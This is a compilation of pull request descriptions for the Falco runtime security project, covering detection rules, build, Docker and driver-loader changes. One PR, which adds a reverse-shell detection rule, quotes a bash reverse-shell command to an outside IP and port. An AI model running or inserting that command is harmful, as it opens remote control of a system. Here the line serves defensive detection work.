"output": "13:50:21.811741662: Notice Repository files get updated (user=root command=exe /var/lib/docker/overlay2/c8a17dac80b37bf1911335032d83ab0be5805fad1ddc02cfa6d591fd96de4927/diff file=/etc/yum.repos.d/CentOS-fasttrack.repo container_id=host image=<NA>) k8s.ns=<NA> k8s.pod=<NA> container=host k8s.ns=<NA> k8s.pod=<NA> container=host",
"priority": "Notice",
"output_fields": {
"container.id": "host",
"fd.name": "/etc/yum.repos.d/CentOS-fasttrack.repo",
"proc.cmdline": "exe /var/lib/docker/overlay2/c8a17dac80b37bf1911335032d83ab0be5805fad1dd …
```

Exclude exe_running_docker_save in the "Update Package Repository" rule

---

rules/falco_rules.yaml

/area rules
- Change default condition of "Contact K8S API Server From Container" rule
- Why we need it
- To use this rule, Users have to set K8S API's IP address for every cluster now.
- I want to use dynamic DNS resolution instead of manual IP address setting. By using updated rule, users can use this rule by default.
- Ref: https://github.com/draios/sysdig/wiki/Domain-Name-Resolution-for-Connections
Fixes #
- Pod can access to K8S API using private ip address, so I stopped using "outbound" macro.
- K8S API …

rule update: modify rule to detect connection to K8S API Server from a container

---

rules/falco_rules.yaml

/area rules
- Modify condition of `The docker client is executed in a container` rule.
- Why we need it
- On GKE, The rule has many false positives because default running container uses kubectl.
- To reduce false positives, and to be able to set additional condition, I would like to add `user_known_k8s_client_container` macro to this rule.
Fixes #
- This Deployment is the cause of false positive on GKE.
- https://github.com/GoogleCloudPlatform/k8s-stackdriver/tree/master/fluentd-gcp-scaler
- `kubectl` is …

rule(The docker client is executed in a container): modify condition to reduce false positive

---

rules/falco_rules.yaml

**Type of PR**
/area rules
This will reduce false-positives related to `automount` writing to `/etc/mtab`. For the sake of completeness (and to help anyone that might not be aware), "mtab lists currently mounted file systems and is used by the mount and unmount commands when you want to list your mounts or unmount all. It's not used by the kernel, which maintains its own list." (https://serverfault.com/questions/267609/how-to-understand-etc-mtab). `automount` is expected to write under `/etc/mtab`, but there was no macro to whitelist it.
**Which issue(s) this PR fixes**: I didn't open an issue for this.
```release-note
rule(Write below etc): allow automount to write to /etc/mtab
```

rule(Write below etc): whitelist automount writing under /etc/mtab

---

proposals/20191030-api.md

/kind design
Writes down a proposal as the outcome of various discussions between me, @fntlnz, @kris-nova, and the whole community about giving Falco an API.
_will link to issues later_
**WIP**
In the coming days me and @fntlnz are going to complete it.
```release-note
NONE
```

proposal: Falco API

---

CMakeLists.txt

/kind feature
/area build
/area tests
This adds a new CMake option `Falco_Coverage` that can be used to generate
code coverage analysis.  I used this while building up my test cases for PR #965 
With `cmake FALCO_COVERAGE=on` the `--coverage` option
is passed to both clang and gcc to help analyze untested
portions of the code base.  It produces gcov files.
These files can be analyzed by many tools such as lcov,
gcovr, etc.
Here is an example of one such tool, lcov:
```sh
lcov --directory . --capture --output-file coverage.info
lcov --extract coverage.info '/source/*' --output-file coverage.info
genhtml coverage.info
```
Note: I …

build: add FALCO_COVERAGE CMake option

---

rules/falco_rules.yaml

/area rules
- Modify `user_known_k8s_client_container` macro to have more strict condition.
- Add image info to output of `The docker client is executed in a container`
- Why We need it
- As I discussed on https://github.com/falcosecurity/falco/pull/955#issuecomment-562341172, I would like to have more strict condition for GCP(GKE).
- To know image info when getting false positives, I would like to add image info to output.
Fixes #
- Output Sample
```
{"output":"18:14:42.779407953: Warning Docker or …
```

rule(macro user_known_k8s_client_container): have more strict condition to avoid false positives

---

docker/builder/Dockerfile
docker/builder/root/usr/bin/scl_enable
docker/builder/root/usr/bin/usage

/kind bug
/area build
This PR adds `llvm-toolset-7` into the `docker-builder` docker image.
Fixes #900 #931 
```release-note
fix: providing clang into docker-builder
```

Adding llvm-toolset-7 into falco-builder docker image

---

userspace/engine/falco_engine.cpp
userspace/engine/falco_engine.h

/kind bug
> /kind design
/kind feature
> /area build
/area engine
> /area rules
> /area tests
Fixes #
```release-note
Also allow POSTing json arrays containing k8s audit events to the …
```

Allow json arrays k8s audit

---

proposals/20191217-rules-naming-convention.md

/area rules
Propose falco rule naming convention
N/A
```release-note
proposal: rules naming convention
```

falco rule naming convention

---

docker/event-generator/Dockerfile
docker/event-generator/docker-entrypoint.sh
docker/event-generator/event_generator.cpp
docker/event-generator/k8s_event_generator.sh
docker/event-generator/yaml/configmap-private-creds.yaml
docker/event-generator/yaml/disallowed-pod-deployment.yaml
docker/event-generator/yaml/hostnetwork-deployment.yaml
docker/event-generator/yaml/nodeport-service.yaml
docker/event-generator/yaml/privileged-deployment.yaml
docker/event-generator/yaml/role-pod-exec.yaml
docker/event-generator/yaml/role-wildcard-resources.yaml
docker/event-generator/yaml/role-write-privileges.yaml
docker/event-generator/yaml/sensitive-mount-deployment.yaml
docker/event-generator/yaml/vanilla-configmap.yaml
docker/event-generator/yaml/vanilla-deployment.yaml
docker/event-generator/yaml/vanilla-role-rolebinding-serviceaccount.yaml
docker/event-generator/yaml/vanilla-service.yaml

> /kind bug
> /kind design
/kind feature
> /area build
> /area engine
> /area rules
> /area tests
Fixes #
```release-note
Add support for k8s audit events to the falco-event-generator container.
```

Add k8s event generator

---

.circleci/config.yml
docker/tester/root/runners/deb.Dockerfile
docker/tester/root/runners/rpm.Dockerfile
docker/tester/root/usr/bin/entrypoint
test/falco_test.py
test/falco_tests_package.yaml

**ATTENTION**: this is blocking all the incoming PRs because we have a problem with the current tester image.
/area build
/area tests
Does two things:
- Introduces a new framework to run tests from packages directly in containers, one can add more instructions to the entrypoint to test to more different distributions
- Fixes the recent problems in building using the docker local image that was lacking the binutils dependency (and that was not needed for the tests)
Fixes #1013 
```release-note
test: integration tests now can run …
```

Refactor integration images

---

rules/falco_rules.yaml

/kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
Fixes #
```release-note
Address several rules FPs observed in live environments
```

Address rules fps

---

userspace/engine/banned.h
userspace/engine/falco_common.cpp
userspace/engine/falco_engine.cpp
userspace/engine/falco_utils.cpp
userspace/engine/formats.cpp
userspace/engine/json_evt.cpp
userspace/engine/rules.cpp
userspace/engine/ruleset.cpp
userspace/engine/token_bucket.cpp
userspace/falco/configuration.cpp
userspace/falco/event_drops.cpp
userspace/falco/falco.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/grpc_context.cpp
userspace/falco/grpc_server.cpp
userspace/falco/grpc_server_impl.cpp
userspace/falco/logger.cpp
userspace/falco/statsfilewriter.cpp
userspace/falco/webserver.cpp

This defines certain functions as invalid tokens, i.e., when
compiled, the compiler throws an error.
Currently only `strcpy` is included as a banned function.
/kind feature
Fixes #788
```release-note
NONE
```

feat(userspace): Add `banned.h` which includes banned functions.

---

userspace/engine/formats.cpp

/kind bug
/area engine
This PR deprecates PR #988 fixing the issue with base64 format (with/without json enabled).
Fixes #987 
```release-note
fix: the base64 output format (-b) now works with both json and normal output.
```

Base64 format fix

---

userspace/engine/json_evt.cpp
userspace/engine/json_evt.h

/kind bug
Fixes the memory leak bug reported by many users on the Falco slack.
WRT I started doing some memory analysis on my dev environment and noticed a pattern I didn’t like:
All the snapshots I was able to take were showing a linear increase in memory usage
Here’s an evidence of the leak, in how audit events are processed.
The problem I observed is that whenever the add_extracted_value function (https://github.com/falcosecurity/falco/blob/master/userspace/engine/json_evt.cpp#L629-L639) is called it adds an element to a list of strings. After that, old elements are never flushed. That leads to the memory leak we can see in the massif output above.
After some debugging, I noticed that add_extracted_value was only …

Fix memory leaks in k8s audit and json events

---

CONTRIBUTING.md
userspace/engine/banned.h
userspace/engine/falco_common.cpp
userspace/engine/falco_engine.cpp
userspace/engine/falco_utils.cpp
userspace/engine/formats.cpp
userspace/engine/json_evt.cpp
userspace/engine/rules.cpp
userspace/engine/ruleset.cpp
userspace/engine/token_bucket.cpp
userspace/falco/configuration.cpp
userspace/falco/event_drops.cpp
userspace/falco/falco.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/grpc_context.cpp
userspace/falco/grpc_server.cpp
userspace/falco/grpc_server_impl.cpp
userspace/falco/logger.cpp
userspace/falco/statsfilewriter.cpp
userspace/falco/utils.cpp
userspace/falco/webserver.cpp

These include:
* vsprintf()
* sprintf()
* strcat()
* strncat()
* strncpy()
This also changes `userspace/falco/logger.cpp` to remove a `sprintf`
statement. The statement did not affect the codebase in any form so
it was simply removed rather than being substituted.
Also adds `BAN_ALTERNATIVE` macro to `banned.h`. BAN_ALTERNATIVE is same as BAN but the message also provides an alternative function that the user could use instead of the banned function.
Fixes #1035
/kind feature
```release-note
NONE
```

Add more functions to `banned.h`

---

cmake/modules/sysdig-repo/CMakeLists.txt
cmake/modules/sysdig.cmake

Also it seemed that any of value of -DSYSDIG_VERSION
failed to propagate, from first cmake to second cmake.
That is, trying to follow instructions didn't have any effect:
```Cmake
```
In the case of a custom version, the checksum is ignored.
/kind cleanup
/area build
Avoids warning when building, and checks against corrupt download errors.
`warning: did not verify file - no URL_HASH specified?`
The old commented out checksum is for some random `dev` version:
See 494edafdb19d7b3a6a432d89fbc31a6e82aa0ad6
```release-note
NONE
```

Verify checksum after downloading sysdig tarball

---

cmake/modules/sysdig-repo/CMakeLists.txt
cmake/modules/sysdig-repo/patch/libscap.patch
integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap-slim.yaml
integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap.yaml
scripts/falco-probe-loader

/kind bug
NONE
Fixes #1049
```release-note
BREAKING CHANGE: the SYSDIG_BPF_PROBE environment variable is now just BPF_PROBE (please update your systemd scripts or kubernetes deployments. 
```

Rename BPF_PROBE and SYSDIG_BPF_PROBE to FALCO_BPF_PROBE and make the variable consistent

---

docker/local/Dockerfile
docker/minimal/Dockerfile
docker/rhel/Dockerfile
docker/slim-dev/Dockerfile
docker/slim-stable/Dockerfile
docker/stable/Dockerfile

/kind bug
/kind cleanup
> /kind design
/area build
> /area engine
> /area rules
> /area tests
Fixes #1015 
Fixes #
```release-note
fix(docker): updating `stable` and `local` images to run from …
```

Fixing stable and local images

---

docker/dev/docker-entrypoint.sh
docker/local/docker-entrypoint.sh
docker/rhel/docker-entrypoint.sh
docker/stable/docker-entrypoint.sh

/kind bug
/area build
It uses the base path in the docker-entrypoint.sh. This is needed because when you build Falco from source along with the driver, it tries to create a link with destination /usr/src//host/usr/src/XXX which is wrong and should be /usr/src/XXX 
```release-note
fix(docker): use base name in docker-entrypoint.sh
```

fix: use base name in docker-entrypoint.sh

---

.circleci/config.yml

/kind bug
/area build
This PR fixes the last step of the new releasing process - ie., pushing docker images to docker hub.
Fixes #1067 
Already set-up docker hub account, access token, and CI environment variables into the right security context.
```release-note
NONE
```

fix(.circleci): dockerhub authentication during releasing process

---

.circleci/config.yml

/kind bug
/area build
Since `minimal` docker images fetch the falco binary from `bin` or `bin-dev` repositories they need to explicitly set the `FALCO_VERSION` variable.
Fixes #
```release-note
NONE
```

docker minimal images need exact FALCO_VERSION

---

CMakeLists.txt
cmake/modules/sysdig-repo/CMakeLists.txt
cmake/modules/sysdig.cmake

The driver version was also setup in the wrong cmake file.
/kind bug
/area build
Passing `-DSYSDIG_VERSION` to cmake was not loading the variable in the inner makefile that we use to download the sinsp, scap and the driver.
This was leading to broken builds when such variable was passed.
Moreover, `PROBE_VERSION` must be set to the same version as the driver, because they are two separate projects with different release lifecycles now that Sysdig and Falco are 100% decoupled from an infrastructure and code point of view.
Also we …

build: PROBE_VERSION must use the driver version

---

.circleci/config.yml
cmake/modules/GetFalcoVersion.cmake
docker/minimal/Dockerfile
docker/slim/Dockerfile
docker/stable/Dockerfile

/kind bug
/kind feature
/area build
It makes the build generate the FALCO_VERSION_PRERELEASE variable, too.
It contains the count of the commits from the last tag on the master.
So versions, from now one will be something like `0.20.0-48+86e6fe3`, where 48 is the number of commits from release `0.20.0`.
This also affects the Falco gRPC Version API, which will also return this new part of the version.
Moreover, having the prerelease version part that will automatically increment as soon we merge a new PR into the master, will fix the ordering of versions we currently have when installing Falco with `apt` or `yum` or `rpm`.
Fixes …

Provide and parse FALCO_VERSION_PRERELEASE part

---

rules/falco_rules.yaml

Signed-off-by: Vicente Herrera <vicenteherrera@vicenteherrera.com>
/kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
Fix rules that used wrong 'tag' keyword to use the right one, 'tags'.
Some rules where using 'tag' keyword instead of valid …

fix: use of "tag" instead of "tags" in default rules

---

docker/event-generator/event-generator-k8saudit-deployment.yaml
docker/event-generator/event-generator-role-rolebinding-serviceaccount.yaml
docker/event-generator/event-generator-syscall-daemonset.yaml
docker/event-generator/k8s_event_generator.sh
docker/event-generator/yaml/configmap-private-creds.yaml
docker/event-generator/yaml/disallowed-pod-deployment.yaml
docker/event-generator/yaml/hostnetwork-deployment.yaml
docker/event-generator/yaml/nodeport-service.yaml
docker/event-generator/yaml/privileged-deployment.yaml
docker/event-generator/yaml/role-pod-exec.yaml
docker/event-generator/yaml/role-wildcard-resources.yaml
docker/event-generator/yaml/role-write-privileges.yaml
docker/event-generator/yaml/sensitive-mount-deployment.yaml
docker/event-generator/yaml/vanilla-configmap.yaml
docker/event-generator/yaml/vanilla-deployment.yaml
docker/event-generator/yaml/vanilla-role-rolebinding-serviceaccount.yaml
docker/event-generator/yaml/vanilla-service.yaml

> /kind bug
> /kind design
/kind feature
> /area build
> /area engine
> /area rules
> /area tests
Fixes #
```release-note
new(docker/event-generator): add example k8s resource files that allow running the …
```

Add k8s event generator resources

---

rules/falco_rules.yaml
test/falco_tests.yaml
test/falco_traces.yaml.in

/area rules
- Modify condition to detect some process names within a container.
- Add evt.dir to avoid detection of same syscall
- Why we need it
- The current rule exclude some process names used on host
- i.e. `k8s_binaries`, `nsenter`
- But `nsenter` could be used to do privilege escalation
- https://twitter.com/mauilion/status/1129468485480751104
- (nsenter is included in many container images like `alpine` by default)
- So I would like to change condition to detect suspicious container activity.
Fixes # …

rule(Change thread namespace): Modify condition to detect suspicious container activity

---

.circleci/config.yml

/kind bug
/area build
Remove the flag `--github-tag-rel-notes` from CI (it does not work).
```release-note
NONE
```

remove github tag rel nots flag from CI

---

CMakeLists.txt

/kind bug
/area build
Replaces the references of intel tbb with its new ome on one-api
Fixes #1104
```release-note
NONE
```

build: fix tbb dependency rename

---

userspace/falco/falco.cpp

/kind feature
Fixes #925
```release-note
new: flag to disable asynchronous container metadata (CRI) fetch `--disable-cri-async`
```

new(userspace/falco): add --disable-cri-async flag

---

.circleci/config.yml

/kind feature
/area build
It can happen that bintray API is unresponsive.
In this case, we may need to re-run the same CI job manually and to not be blocked by
already created versions for the given FALCO_VERSION env variable.
So, it may also be necessary to override already pushed packages.
Finally, we don't want _stable_ releases (eg., 0.21.0) to be pushed into the `*-dev` repositories too, only in the stable repositories.
Fixes #1106
```release-note
NONE
```

Increase robustness of the release workflow

---

.circleci/config.yml
CMakeLists.txt
docker/local/docker-entrypoint.sh
docker/rhel/docker-entrypoint.sh
docker/stable/docker-entrypoint.sh
docker/tester/root/usr/bin/entrypoint
scripts/CMakeLists.txt
scripts/falco-driver-loader
test/falco_test.py
userspace/falco/config_falco.h.in
userspace/falco/falco.cpp

/kind bug
/kind cleanup
/area build
/area tests
This PR introduces some fixes and updates needed because the Falco version and the driver version are distinct values now.
So this PR mainly updates the `falco-probe-loader` script for this reason. Also renaming it to `falco-driver-loader`.
Futhermore, this script obtains now some values (like the `DRIVER_VERSION` variable value) at configuration time.
Finally it also ensures that the `FALCO_VERSION` env variable inside docker containers contains the same value returned by `falco --version`, not the docker image tag.
Fixes #1107
Fixes #1110 
**Does …

Falco version and driver version are not coupled anymore

---

rules/k8s_audit_rules.yaml

> /kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
`kops` tries to create `kube-proxy` and `kube-dns` sa in `kube-system` namespace every minute which triggers rule `Service Account Created in Kube Namespace`. Restrict the condition …

rule update: only detect sa created in kube namespace with success

---

cmake/modules/sysdig.cmake

Bump version of the driver to (commit: d809a4cc0575f0268963de8eb92ba9416a485d8b) that fixes #896
Summary of the needed fix can be found at patch [0]
[0] https://patch-diff.githubusercontent.com/raw/draios/sysdig/pull/1612.patch
/kind bug
/area build
/area engine
Fixes #896 
```release-note
update: bump driver version to cd3d10123e
fix(driver/bpf): stricter conditionals while dealing with strings
```

fix(driver/bpf): exact check on bpf_probe_read_str() return value

---

cmake/modules/sysdig-repo/patch/libscap.patch

The HOST_ROOT environment variable was incorrectly detected when
deploying Falco inside a container.
/kind bug
/area build
Fixes #1084 
Fixes #865 
Fixes #1075 
```release-note
fix: HOST_ROOT environment variable detection
```

fix: HOST_ROOT environment variable detection

---

cmake/modules/sysdig.cmake

/kind bug
/area build
It bumps the driver version to `a259b4bf49c3330d9ad6c3eed9eb1a31954259a6` to include a fix on `curl_multi_wait` arguments (ie., `timeout_ms`).
Now the Falco driver is able to connect to docker even when using libcurl >= 7.69.0
Fixes #1139
Refs https://github.com/falcosecurity/falco/issues/1075
Refs https://github.com/falcosecurity/falco/issues/865
```release-note
update: driver version a259b4bf49c3
fix: connect to docker …
```

driver version bump to a259b4bf49c3

---

rules/falco_rules.yaml

/kind bug
/area rules
Some rules currently use "mitre_defense_evation" tag instead of the correct tag of "mitre_defense_evasion". Other rules use the correct tag. Anything matching against these tags would currently need to check for both.
Fixes #1142 
```release-note
rule(Delete or rename shell history): "mitre_defense_evation" tag corrected to "mitre_defense_evasion"
rule(Delete Bash History): "mitre_defense_evation" tag corrected to "mitre_defense_evasion"
```

Fix tag typos

---

rules/falco_rules.yaml
rules/k8s_audit_rules.yaml

/kind feature
/area rules
These proposed rules detect network and Kubernetes activity that, outside some whitelists, could indicate malicious activity. No other rules perform similar detections, and they are generic so everybody will benefit for having them in their Falco installation. See the proposed release notes for specific details.
Fixes https://github.com/falcosecurity/falco/issues/1121
The Issue is just a description of the proposal of the rules, I don't know if it would have been better to just create de pull request only. …

Proposal for 2 new Falco rules for syscall source, and 4 for Kubernetes audit source.

---

rules/falco_rules.yaml

/kind feature
/area rules
This PR introduces two things : a list of allowed system binaries and a macro to allow certain system binaries to use the network under certain conditions.
The list is really just for convenience and is not meant to be overridden by users. It's something I noticed many other rules had and I figured it wouldn't hurt to add it here while I was adding the macro.
The macro is useful because someone might want to allow certain system procs to use the network under certain conditions. Our use-case is that we use a program output which publishes a message to an SNS topic in AWS to be picked up by our other tools. To do this, we use AWS CLI, which …

Add a macro to whitelist system binaries using the network

---

integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap-slim.yaml
integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap.yaml
integrations/k8s-using-daemonset/k8s-without-rbac/falco-daemonset.yaml

The libsinsp cri interface prepends (at runtime) the `HOST_ROOT` prefix.
Thus, even if the CRI socket has been mounted on
`/host/var/run/containerd/containerd.sock`, the correct `--cri` flag
value is `/var/run/containerd/containerd.sock`.
```release-note
docs(integrations/k8s-using-daemonset): --cri flag correct socket path
```

fix(integrations/k8s-using-daemonset): --cri flag correct socket path

---

integrations/k8s-using-daemonset/falco-event-generator-deployment.yaml
integrations/k8s-using-daemonset/k8s-with-rbac/falco-account.yaml
integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap-slim.yaml
integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap.yaml
integrations/k8s-using-daemonset/k8s-without-rbac/falco-daemonset.yaml
integrations/k8s-using-deployment/falco-event-generator-deployment.yaml
integrations/k8s-using-deployment/k8s-with-rbac/falco-k8s-audit-account.yaml
integrations/k8s-using-deployment/k8s-with-rbac/falco-k8s-audit-deployment.yaml

/kind feature
/area kubernetes
Support for Kubernetes 1.16 and 1.17 when deployed as DaemonSet.
Fixes #1043
Fixes #993 
Removed deprecated Kubernetes 1.16 API resource versions.
Affected API:
- DaemonSet
- Deployment
- ClusterRole
- ClusterRoleBinding
Documentation:
- https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.16.md#deprecations-and-removals
- https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.17.md#deprecations-and-removals
NONE
**Release note**
```release-note
docs(integrations): update …
```

Support for Kubernetes >= 1.16

---

integrations/k8s-using-daemonset/k8s-with-rbac/falco-account.yaml
integrations/k8s-using-deployment/k8s-with-rbac/falco-k8s-audit-account.yaml

/kind bug
In [falco/integrations/k8s-using-daemonset/k8s-with-rbac/falco-account.yaml](https://github.com/falcosecurity/falco/blob/master/integrations/k8s-using-daemonset/k8s-with-rbac/falco-account.yaml#L17), we create a ClusterRole for the Falco ServiceAccount. I reviewed our kube audit logs and saw that Falco was getting an access denied on:
- `watch` `/apis/apps/v1/watch/deployments?pretty=false`
- `watch` `/apis/apps/v1/watch/replicasets?pretty=false`
- `watch` `/apis/apps/v1/watch/daemonsets?pretty=false`
Falco tries those call over and over again which floods audit logs and I'm quite sure Falco is not working as expected without that …

Add missing privileges for the apps Kubernetes API group

---

rules/falco_rules.yaml

> /kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
Detect reverse shell connection from a container.
Fixes #
`/bin/bash -i >& /dev/tcp/34.204.xxx.xxx/1234 0>&1` …

rule update: add a rule to detect reverse shell

---

CMakeLists.txt
scripts/falco-driver-loader

/kind cleanup
/kind feature
/area build
This PR refactors the `falco-driver-builder` in order to support the downloading from the upcoming "drivers build grid".
Fixes #1125 
Docs need to be updated in order to show to users an alternative approach of installing the Falco driver through the `falco-driver-loader` script (present into the container).
```release-note
update: containers look for prebuilt drivers on the Drivers Build Grid
```

Updates to the falco-driver-loader script

---

scripts/falco-driver-loader

/kind bug
NONE
It fixes the URL from which the `falco-driver-loader` script fetches the drivers.
In fact, the correct URL does not contain the distinction between the driver type (eBPF probe or kernel module): the structure is flat on the server.
Eg., 
https://dl.bintray.com/driver/$driver_version$/falco_$target$_$kernelrelease$_$kernelversion$.[ko|o]
Fixes #1125 
```release-note
fix(scripts): fetch drivers (kernel module or eBPF probe) from …
```

Correct "drivers build gruid" URLs

---

scripts/falco-driver-loader

Signed-off-by: Stuxend <friquet@gmail.com>
/kind bug
/area build
This PR fix a curl execution into falco-driver-loader. The command need -L to follow redirects, the URL "https://dl.bintray.com/falcosecurity/driver/XXXXX" it's a CDN, and the exact behaviour (whether you get redirected or not) might depend on your location, so to fix this we need to set the -L to curl cuz curl does not follow redirects by default.
This PR fix a curl execution into falco-driver-loader. The command need -L to follow redirects, the URL "https://dl.bintray.com/falcosecurity/driver/XXXXX" it's a CDN, and the exact behaviour (whether you …

fixing curl command error 0 bytes for CDN download.

---

cmake/modules/gRPC.cmake
userspace/falco/CMakeLists.txt

Only while compiling with `USE_BUNDLED_DEPS=Off`
/kind bug
/area build
Fixes #
```release-note
NONE
```

fix: grpc compilation with splitted gpr library

---

cmake/modules/sysdig.cmake

/kind bug
/area build
Fixes #1173 
Refs https://github.com/draios/sysdig/pull/1621
```release-note
fix: support Falco driver on Linux kernels 5.6.y
```

fix(cmake/modules): update driver to support kernels 5.6.y

---

.circleci/config.yml
docker/driverloader/Dockerfile

/kind bug
> /kind design
/area build
> /area engine
> /area rules
> /area tests
The `publish/docker-dev` CI workflow is broken because of `FALCO_VERSION` does not match the image tag.
[This](https://app.circleci.com/pipelines/github/falcosecurity/falco/360/workflows/7e51461 …

fix driverloader dev

---

tests/CMakeLists.txt
tests/engine/test_rulesets.cpp
tests/engine/test_token_bucket.cpp
userspace/engine/falco_engine.cpp
userspace/engine/falco_engine.h
userspace/engine/ruleset.cpp
userspace/engine/ruleset.h

/kind bug
> /kind design
> /area build
/area engine
> /area rules
/area tests
This adds unit tests for ruleset handling and adds the ability to only allow for exact matches when adding rules to the falco engine. The current behavior matches substrings. This is usually fine but there can be some cases where …

Allow exact rule matches ruleset

---

.github/PULL_REQUEST_TEMPLATE.md

NONE
Cleanups the PR template. No more area/examples, and area/integrations as per recent discussions on Artifacts.
Refs #1114 
```release-note
NONE
```

update(.github): remove examples and integrations from PR template

---

scripts/falco-driver-loader

/kind bug
/area build
The upstream files for the generic Ubuntu kernel are all called ubuntu-generic instead of ubuntu
see: https://dl.bintray.com/falcosecurity/driver/96bd9bc560f67742738eb7255aeb4d03046b8045/
Fixes #
```release-note
fix(scripts): upstream files (prebuilt drivers) for the generic Ubuntu kernel contains "ubuntu-generic"
```

fix(falco-driver-loader): target for ubuntu is ubuntu-generic

---

docker/driver-loader/docker-entrypoint.sh
scripts/falco-driver-loader

> /kind bug
> /kind design
/kind feature
> /area build
> /area engine
> /area rules
> /area tests
See #1193
Fixes #1193
Fixes #1125 (again)
```shell
Usage:
falco-driver-loader [driver] [options]
Available drivers:
module        kernel module (default) …
```

falco-driver-loader - break apart logic and improvements

---

rules/falco_rules.yaml
rules/k8s_audit_rules.yaml

> /kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
Fixes #
```release-note
rule(macro trusted_logging_images): Add addl fluentd image
rule(macro trusted_logging_images): Let azure-npm image write …
```

Address rules fps may

---

rules/falco_rules.yaml

/kind feature
/area rules
This macro will be useful because it will make it possible to filter out
events with a higher degree of granularity than is currently possible
for the `Set Setuid or Setgid bit` rule.
For example, if some application is expected to set the setuid or the
setgid bit under a specific condition, like if it's started with a
specific command, then the `user_known_chmod_applications` list is not
enough because we don't want to filter out _all_ events by this
application, only specific ones. This macro allows that.
A concrete example of this is when using docker-in-docker : the `dockerd` process is triggering the `Set Setuid or …

rule(macro user_known_set_setuid_or_setgid_bit_conditions): create macro

---

docker/tester/root/usr/bin/usage
test/README.md
test/confs/program_output.yaml
test/requirements.txt
userspace/falco/falco.cpp

/area tests
Fixes #
```release-note
docs(test): instructions to run regression test suites locally
```

docs(test): instructions to run regression test suites locally

---

rules/falco_rules.yaml

/kind bug
/area rules
This PR fixes some rule/macro conditions to:
Additional context can be found in commits' messages.
Fixes #
This is my first PR that fix the rules :)
*Test cases*
- `Mkdir binary dirs` with `mkdirat`
```shell
docker run --rm -it falcosecurity/event-generator:0.3.0 run syscall.MkdirBinaryDirs
```
- `Modify binary dirs` with `rename`
```shell
sudo touch /bin/test-falco-rules
sudo rename test-falco-rules test-falco-rules-renamed /bin/test-falco-rules
```
- `Modify binary dirs` with `renameat`
```shell
docker run --rm …
```

correct rule conditions to support syscall variants 

---

userspace/falco/logger.cpp

Signed-off-by: Shane Lawrence <shane@lawrence.dev>
/kind bug
> /kind design
> /area build
/area engine
> /area rules
> /area tests
Fixes #1256 
Yes. 
```release-note
fix: missing newline from some log messages (eg., token …
```

Log modified copy instead of original message.

---

falco.yaml

/kind bug
/area engine
This PR changes the value of `webserver.k8s_audit_endpoint` from `/k8s_audit` to `/k8s-audit`, because a path that contains an underscore (`_`) won't work when the audit sink webhook is configured with a [service reference](https://kubernetes.io/docs/tasks/debug-application-cluster/audit/#service-reference) (instead of an [URL](https://kubernetes.io/docs/tasks/debug-application-cluster/audit/#url)).
To reproduce the issue just `kubectl apply` the following example:
```yaml
apiVersion: auditregistration.k8s.io/v1alpha1
kind: AuditSink
metadata:
name: falco-audit-sink
spec:
policy:
level: …
```

correct k8s audit endpoint

---

cmake/modules/sysdig.cmake
rules/falco_rules.yaml
userspace/engine/falco_engine_version.h

/area rules 
**What this PR does / why we need it:**
The PR adds the ability to identify exec drift in containers and targets RCE use cases. Full explanation can be found in issue 1248.
**Which issue(s) this PR fixes:**
https://github.com/falcosecurity/falco/issues/1248
**Does this PR introduce a user-facing change?:**
New drift detection rules added
rule(Container Drift Detected): detect new exec created in a container
**Special notes for your reviewer:**
Using this rule will require Falco engine version 6. Any attempt to copy paste the rules to an older Falco version will result in rules compilation errors. 
In addition, the rule was built to address container run-time use cases, and …

rule(Container Drift Detected): detect new exec created in a container

---

rules/falco_rules.yaml

/area rules
This macro is useful to allow binaries to be written under certain circumstances. For example, it may be fine to install a binary during a build in a ci/cd pipeline. A more concrete use-case would be the installation of [packer](https://www.packer.io/) by placing its binary inside the `/bin` directory, which is needed to build AMIs during builds.
None
None
```release-note
rule(macro user_known_write_below_binary_dir_activities): allow writing to a binary dir in some conditions
```

rule(macro user_known_write_below_binary_dir_activities)

---

rules/falco_rules.yaml

/kind feature
/area rules
This PR simply adds a macro to allow exclusion conditions to be set for the `Terminal shell in container` rule. There are some use-cases under which this is normal and should be ignored. For example, some configuration management tools can be run inside docker and operate with an interactive terminal. Falco generates an alert from this, but it's expected to happen for the configuration manager, so it would be nice to be able to whitelist just the configuration management tool.
No issues open for this.
```release-note
rule(macro …
```

Create a macro to whitelist terminal usage in containers

---

rules/falco_rules.yaml

/kind feature
/area rules
**Editing the `exe_running_docker_save` macro**:
While using Falco, I noticed we were getting many events that were virtually identical to those that were previously filtered out by the `exe_running_docker_save` macro, but where the `cmdline` was something like `exe /var/run/docker/netns/cc5c7b9bb110 all false`. I believe this is caused by the use of docker-in-docker. This is removed by the new `or proc.cmdline contains "/var/run/docker"` part of the macro.
**`Change thread namespace` rule edit**:
These application binaries raise events in the `Change thread namespace` rule as part of their normal operation.
Here are more …

Change chread namespace

---

rules/falco_rules.yaml

/kind bug
/area rules
:point_right: #1141
Fixes #1141
```release-note
rule(macro `root_dir`): correct macro to exactly match the `/root` dir and not other with just `/root` as a prefix  
```

rule(macro `root_dir`): correct macro to exactly match the `/root` dir and not other with just `/root` as a prefix

---

rules/k8s_audit_rules.yaml

/kind bug
/area rules
kops 1.17 adds a kube-apiserver-healthcheck user: https://github.com/kubernetes/kops/tree/master/cmd/kube-apiserver-healthcheck
Logs are currently spammed with:
```
